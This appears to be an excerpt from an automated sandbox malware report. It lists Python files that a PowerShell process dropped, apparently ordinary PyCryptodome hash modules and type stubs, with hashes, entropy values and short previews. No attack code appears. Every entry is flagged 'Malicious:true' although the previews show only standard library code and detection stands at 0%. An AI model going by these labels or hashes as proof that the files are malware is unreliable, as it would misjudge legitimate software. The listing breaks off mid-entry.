                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYBjvIY33hUlRypRyLu1AwLsQwu5TUhGLs7Ug4Ls7UdRy5Ryn:1REET3RWQEWAwL/N/L+14L+ywy
                                                                                                                                                                                                                              MD5:A9429F32C25E1E86987C94D3EE514342
                                                                                                                                                                                                                              SHA1:176B307242F24A7BFF87D2A74EE609324AD26550
                                                                                                                                                                                                                              SHA-256:84F643A25DF20E6A761AD4E1ECDC6F04493DB5CCAF6108254B944A31662A00E7
                                                                                                                                                                                                                              SHA-512:2A7910E7C1091CC7F9F1D4993EF594F77B2E29841A2B64A702A53BFF6C7231B1224A63A9FC979117614547F699A0EA7864A5C622B083617A1AF316CD51AB1B79
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class RIPEMD160Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> RIPEMD160Hash: ..... def new(self, data: Buffer = ...) -> RIPEMD160Hash: .......def new(data: Buffer = ...) -> RIPEMD160Hash: .....digest_size: int..block_size: int..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1172
                                                                                                                                                                                                                              Entropy (8bit):5.117383873972604
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:lcAXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/FbUgtj+tue:KIB0jcQHMsvI/S3oCFbnZ+B
                                                                                                                                                                                                                              MD5:6C017EB81EF21818A9368CCC5143F50B
                                                                                                                                                                                                                              SHA1:1D1229CDE4338C4BA3F969AF90700FC8960BBF08
                                                                                                                                                                                                                              SHA-256:C86BAD9D4AFFEAC58CE3884195E177E1418721C8E3B70684ACDDC36E74BC943F
                                                                                                                                                                                                                              SHA-512:5BF8D63655B09CAE49255FBCBAB152CAC1FF5E14FE5BAE2AA4221E6618E911FA0D5193743C82BB66473699D59974B9CE1633CA0DE68495B9CDF63FB947D2AD7F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):165
                                                                                                                                                                                                                              Entropy (8bit):4.73872569825065
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SbFQZmK2lfvo0NEr3Ssov+7Qt/ZTzJmMkt/Z1oQpKGOIWufs/96Lf9:SbFsmK2lfWr3SsBktxTN+tx1xpdhVs/2
                                                                                                                                                                                                                              MD5:0DE894DECF1A876B03938929070F04E5
                                                                                                                                                                                                                              SHA1:DCB783EF505138E743F04546FD5A2D6C6A4840FB
                                                                                                                                                                                                                              SHA-256:0AEA71662B258A56912F1274D95677A727F619A48604D1B1B991891F22ED047D
                                                                                                                                                                                                                              SHA-512:B2468F52C9C79C44A5BB9CC002E9318FA7C18B60918A85797C21E1A925A23070262A892D864CD1A66F4C14646AC38B8142F2F578D869F453060F58F41C663652
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# This file exists for backward compatibility with old code that refers to..# Crypto.Hash.SHA....from Crypto.Hash.SHA1 import __doc__, new, block_size, digest_size..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6875
                                                                                                                                                                                                                              Entropy (8bit):4.5821494704539845
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dFQHvo7H1kIpQ1IUeNNUPHSvwmlz+irILNHU3aOMj9XXgNp5+T/HSxUYfARk:bQHvgQ1IVNNx9+iUN0KN9nINdoRk
                                                                                                                                                                                                                              MD5:ADA65380EE21DCC4351BBF2883F9B8FE
                                                                                                                                                                                                                              SHA1:F1C8A946C677B83B30B5FAADAE98C8EF30BA2A22
                                                                                                                                                                                                                              SHA-256:6C3CE9B0E7B65218814CEB19987644C776D4C36495C2875470FC94149A8A0015
                                                                                                                                                                                                                              SHA-512:505E499F9D590814F2EED4384D38708D373EC7C5E8132D20A16FCFA84F056F2181FFF8AE044E73B21C9F4646F5CF0CA2D012F39E342F2763C2ECCF7CD7E5FCF8
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):555
                                                                                                                                                                                                                              Entropy (8bit):4.858937300843863
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB3vIY3vRypRyLu1AGR4Qwu59gR48OR4pRy5Ryn:1REcT3JQEWAczqjUswy
                                                                                                                                                                                                                              MD5:B35CDD0C45717949B3D05F871CE86E01
                                                                                                                                                                                                                              SHA1:937CCC519B51BC2AA994CB9F8BD21AAD37865B74
                                                                                                                                                                                                                              SHA-256:4FC9652243B1B4A443C08C6B22F5C5343C63453405A13FBE9CC9DD12DE6951EA
                                                                                                                                                                                                                              SHA-512:92E8217DD0C0FA48A33EC261921B5BB6EB385AE47271F2E2E447EFD29279FEE668ECD3A8E910AF34C062CB6CC7CAFE836525CBD93194335F3996FCF78397F69F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA1Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA1Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA1Hash: .......def new(data: Optional[Buffer] = ...) -> SHA1Hash: .....digest_size: int..block_size: int..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7087
                                                                                                                                                                                                                              Entropy (8bit):4.539811851927445
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dFQHvo7HgkIxtUI7eJ+DqHSv4bz1iBI+6NHh3aOM0CXXiNvs54/WxUvRqRk:bQHvjtUI6J+21i6NBKOCnE+GQRk
                                                                                                                                                                                                                              MD5:DA93616992C4934DB1A0D8073472F425
                                                                                                                                                                                                                              SHA1:9F9D2B184F043FF932BFDDB3E21B647BB5C67FB7
                                                                                                                                                                                                                              SHA-256:D872AF137DA84299B930FBFD1FC433FC86E0B38E0046E3D5F981F7EED9BB8CB8
                                                                                                                                                                                                                              SHA-512:3B1554F21F095128B5C937E154DC2614DDEFF3F59654AE3B676199A36C4E74BF173E997F5196A94670BF6AF94B10CBB42AE71D92B722005FC7436B159B2CCEDB
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):563
                                                                                                                                                                                                                              Entropy (8bit):4.8974516866478135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB3vIY36RypRyLu1AGR4Qwu5YgR4vOR40Ry5Ryn:1REcT36QEWAczPsUPwy
                                                                                                                                                                                                                              MD5:F91615062C7CF8B106319B16A210EDD1
                                                                                                                                                                                                                              SHA1:6BB2CC5E2BB4140E17A3CB821E84FD8408798AEF
                                                                                                                                                                                                                              SHA-256:A3FBCEE498C3C4CADC8D5136ACED4C69DE9B941802AEA4AEF8C6B272DF1E054A
                                                                                                                                                                                                                              SHA-512:305B86FDCA88498DC390D013DF6F8ECE0D47A3E79C7E2855D282A8DDE865EE0914643960F04082D52B906EC5DC0603B5403316D87A03A0E0F89178D8D6108497
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA224Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA224Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA224Hash: .......def new(data: Optional[Buffer] = ...) -> SHA224Hash: .....digest_size: int..block_size: int..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7082
                                                                                                                                                                                                                              Entropy (8bit):4.551051071355653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dFQHvo7HgkIfKXI6e2D0FHSv3ezgi3IYVNHi3aOMtDXXZN4XM1/WxUvT1Rk:bQHvBKXIT2DsgiVNCKnDno1GBRk
                                                                                                                                                                                                                              MD5:3AE05618B8FF7C9E5CB142C185620CD7
                                                                                                                                                                                                                              SHA1:7568E53C598F80B07FCC378D6BB67B92A1285E1D
                                                                                                                                                                                                                              SHA-256:DA3433ADAEBE699670076ABB87B264F30B568692279E535240EE76D65A33A4B9
                                                                                                                                                                                                                              SHA-512:FADB71B017E324ECBD1D35BB1E39B0AD017BF3A965AFDA783EC719BB877EC64CC4458209F819C9CD07B3FAF9CD1437F55648BF1D6F74EE883AA74185108E50D9
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):630
                                                                                                                                                                                                                              Entropy (8bit):4.955837939042722
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYBS55RypRyLXFL1AG7EY3AwNIY3T5Dvg7EY3LCO7EY3LMRy5Ryn:1RENQEXFRAQ/3v3Ts/3+Y/3kwy
                                                                                                                                                                                                                              MD5:5630B6D27721452497E9BEE7183E9925
                                                                                                                                                                                                                              SHA1:ACF9207E410A212984F867D9B1FEEEEEDA3C6B86
                                                                                                                                                                                                                              SHA-256:07892D70C0FA32A19DDA232203BD7FF0D25B19F30E599924836A8D4BB6161A71
                                                                                                                                                                                                                              SHA-512:1DC45AFC8773B4D797246C6972D9EFD60514C95F8C7AC19FA85D72493E7B92DE2475A2CD0AF5E11152B129E7B6904AC5DD88B378DA9D17749B2C0FD85C9A541D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union, Optional......class SHA256Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Union[bytes, bytearray, memoryview]]=None) -> None: ..... def update(self, data: Union[bytes, bytearray, memoryview]) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA256Hash: ..... def new(self, data: Optional[Union[bytes, bytearray, memoryview]]=None) -> SHA256Hash: .......def new(data: Optional[Union[bytes, bytearray, memoryview]]=None) -> SHA256Hash: .......digest_size: int..block_size: int..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7085
                                                                                                                                                                                                                              Entropy (8bit):4.550445959384944
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dFQHvo7HgkI7+bImeS/IhHSvqIzEiLI8BNHG3aOMtrXXIN8Xkl/WxUv/5Rk:bQHvl+bIHS/5Ei9NmKzrnNBGBRk
                                                                                                                                                                                                                              MD5:430024F4F59A49D48670405B3872A139
                                                                                                                                                                                                                              SHA1:38B2F9BFDA9D28D665317305B6A9A5CE61245EF0
                                                                                                                                                                                                                              SHA-256:C9264E99E50F4D958A133F2DD00B90384767753A0BC0C8345BEBA0B22CD46FF0
                                                                                                                                                                                                                              SHA-512:22268CB2CBA27B1144D7F1A3D20ACAB0B9EE91E23E94618EF615E042EEFD672FD9E261BA1C9EB78FE5576D80D075093178F1AD38BB5947CD1A8603F67F67224F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):563
                                                                                                                                                                                                                              Entropy (8bit):4.911661278122058
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB3vIY3RRypRyLu1AGR4Qwu5LgR4+OR47Ry5Ryn:1REcT33QEWAczstU6wy
                                                                                                                                                                                                                              MD5:33C3A44EFBCBD9A7B7DB7C3E4FA0CF28
                                                                                                                                                                                                                              SHA1:FCFEFCF1D7DAFBF71741A52550364BDF4813E021
                                                                                                                                                                                                                              SHA-256:102F8DCEC4B3E3E3E019F6CE2B165C0FDDC41B70EB2E3169270BE35F227F2D5F
                                                                                                                                                                                                                              SHA-512:A119DC31EADE919C8572205CB2E9865D8C305AFB21CE5A4189885524A82E7086CA1B86103EBCC36398A63FC89D750C3918CDDC18DFB3B9F0DDF6824AACDBBEF8
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA384Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA384Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA384Hash: .......def new(data: Optional[Buffer] = ...) -> SHA384Hash: .....digest_size: int..block_size: int..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6353
                                                                                                                                                                                                                              Entropy (8bit):4.672672499210179
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dFQHvo7HgkIlBSvxEJixIVDkW5baOMnXXskHYeH:bQHvlJimk0eJn1YW
                                                                                                                                                                                                                              MD5:9043AD3C12487A14FB6439D47EA865E7
                                                                                                                                                                                                                              SHA1:11B5DECAE966B2517EF1EFAC5868CC00C6029EEB
                                                                                                                                                                                                                              SHA-256:26CA1C9F197F6B87E4F727A612CEDA108D0A9C56D101EFB51BC9295270DFA16C
                                                                                                                                                                                                                              SHA-512:F9A84C204734A7E38C14A8F371A358A8B04CB23E72376B54A77143B80E4C9B41914CE41D1D68C1D0BE70FDB5DE7F11BC7C4640E3B1EBBB5A23DEDF0EE4B772BF
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):624
                                                                                                                                                                                                                              Entropy (8bit):4.938042917334959
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB3vIY3uMRRypRyLXFL1AGRT7wNMS5sMVgRkhNMsaLBCUMqRy5Ryn:1REcT3d3QEXFRAcRS5IkhWsaLBwqwy
                                                                                                                                                                                                                              MD5:AC7852028AC4AED442E756540D27AA6A
                                                                                                                                                                                                                              SHA1:1281E2F19BCC6041AB8D5E6AE8D6CB75CC408231
                                                                                                                                                                                                                              SHA-256:AB9ABF3623247F77FDE55038C8531FF4C22E70532CDEF140FA9F0B645A15AC36
                                                                                                                                                                                                                              SHA-512:DAE8FFCBE304DA6899DF030BA7444F3C87454BFAF774D595BCACDF6B038C8EEAD490D1DA5F7E36735F70EC9612F43F0C3ECE0FE95341F96FB72E0E433D0E4F83
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_224_Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_224_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA3_224_Hash: ..... def new(self, data: Optional[Buffer]) -> SHA3_224_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_224_Hash: .......digest_size: int..block_size: int..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6353
                                                                                                                                                                                                                              Entropy (8bit):4.6762672347190115
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dFQHvo7HgkIl3SvcESixIVskWCbaOMAXXXkHnB/:bQHvGSiJkXeSnin9
                                                                                                                                                                                                                              MD5:0868D205D448B5B2B767719C736C05E1
                                                                                                                                                                                                                              SHA1:8EA67599F4CA177A9DFB7779A0702D7BEF755966
                                                                                                                                                                                                                              SHA-256:5F7BCA81167FE52F31335BB83CC924990DAE60A7AED2552C248F20F911C234C6
                                                                                                                                                                                                                              SHA-512:679B4A54236FE8E3EB6176FF8D13FFD61380D4AB34E77CD0429E51E26EC8AD4F004FA4A987F76B98FEB8CABC8ABFF232C6B04F2647F0F31C91289E421C2EC074
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):624
                                                                                                                                                                                                                              Entropy (8bit):4.9540685583606
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB3vIY3uBRypRyLXFL1AGRT7wNC5slgRkhNcaLBCU6Ry5Ryn:1REcT3mQEXFRAc9rkh6aLB+wy
                                                                                                                                                                                                                              MD5:7B1F16C4E7038211DB89A5FA930FA0EE
                                                                                                                                                                                                                              SHA1:DD49BD9504AFCB162C3589155FA01D521A768600
                                                                                                                                                                                                                              SHA-256:7EEF366E028519327074AADF07FEF65FD87564DEAE82A1DE1E03634A928047AB
                                                                                                                                                                                                                              SHA-512:6155A0F2DD3D2DF8F7E0002AFC1EE7877917AA7094EF7D1DBB0F0DEABCD44BECB498C5C0998186C2E09F1C394BF74DE6C526054D42A78D2F552A6E67C062E58C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_256_Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_256_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA3_256_Hash: ..... def new(self, data: Optional[Buffer]) -> SHA3_256_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_256_Hash: .......digest_size: int..block_size: int..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6453
                                                                                                                                                                                                                              Entropy (8bit):4.700607293143974
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dFQHvo7HgkIlvSvlEGixIVrkW2baOMQXXtPkHnlg:bQHvPGikkXe2ntanO
                                                                                                                                                                                                                              MD5:98C4CAA0CC1DA8F19316CA87DCC258CB
                                                                                                                                                                                                                              SHA1:E7C38A5E01D9670BA19D51D6157BB609B194E82A
